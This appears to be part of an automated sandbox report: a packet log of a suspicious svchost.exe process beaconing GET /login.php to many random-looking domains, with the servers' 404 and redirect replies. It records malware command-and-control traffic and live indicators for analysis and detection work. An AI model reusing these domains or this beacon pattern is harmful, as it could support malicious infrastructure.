                                                                                                                                                                                                            Nov 11, 2024 18:25:29.986627102 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTZjNTkyYzMtMDczMC00YTE5LWFhYzktYmU5YjdmMzc2NTg4IiwicGFnZV90aW1lIjoxNzMxMzQ1OTI5LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            34192.168.2.1062041178.162.203.202807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.559360027 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            35192.168.2.1062044208.100.26.245807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.575048923 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.022331953 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.271461964 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.375968933 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            36192.168.2.106204323.253.46.64807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.575469971 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.016812086 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:24 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.016828060 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            37192.168.2.1062045154.212.231.82807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.583966970 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.465089083 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.484402895 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.840529919 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            38192.168.2.1062046188.114.96.3807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.691488028 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.544199944 CET973INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsyqrujlCCW9OnUrTdsWRtAkRWKqdfjh2uqMt8w%2FxzM1ZjFStdrlVVMu2qwA3tP0BhddlUqxnfHiLeA1%2F%2F8oKvecTwQ1%2Bx0m6PHQhQPiayNB4B4ZuG5bJjm5d%2BCpHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb6089cfb006-NRT
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=155357&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.867173910 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.205941916 CET975INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1Axcy4%2BLUqyQ93DUcmQ0ytZYoe3fCFf1yN%2F8KEFNJFQNPlNp0b06t9KaxfezOOeS2r5leNB%2BRFaLS5tIDqYT0GSHBzplPsUathTCHH7GEjwWO3FYUaHBYdoG9qnJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb6af8d6b006-NRT
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=155357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=973&recv_bytes=486&delivery_rate=18633&cwnd=32&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            39192.168.2.106204799.83.170.3807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.739269972 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.171583891 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:30 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            40192.168.2.106204823.253.46.64807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315834045 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.773809910 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:25 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.773822069 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            41192.168.2.1062052178.162.203.202807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549607992 CET243OUTGET /login.php HTTP/1.1
